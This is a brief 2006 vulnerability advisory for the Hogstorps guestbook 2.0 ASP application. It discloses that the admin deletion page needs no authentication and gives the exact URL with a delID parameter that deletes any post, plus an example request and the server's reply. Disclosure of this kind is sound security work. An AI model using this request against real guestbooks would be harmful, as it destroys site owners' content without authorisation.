- Remote Access to Admin Pannel without Authentication -
-= Hogstorps guestbook 2.0 =-
Omnipresent
May 04, 2006
Remote Access to Admin Pannel without Authentication
Hogstorps guestbook 2.0
A free and simple guestbook.
The application is vulnerabile to a Remote Access to Admin Pannel without Authentication.
A user can delete posts, only using a simple string sent via browser.
http://127.0.0.1/[path_of_application]/admin/radera/tabort.asp?delID=[Number_of_post]
Example: http://127.0.0.1/[path_of_application]/admin/radera/tabort.asp?delID=119
And you will receive the message:
The message is deleted, go back to guestbook!
Aspcollection from Hogstorps IF
Not Informed!
omnipresent
[email protected]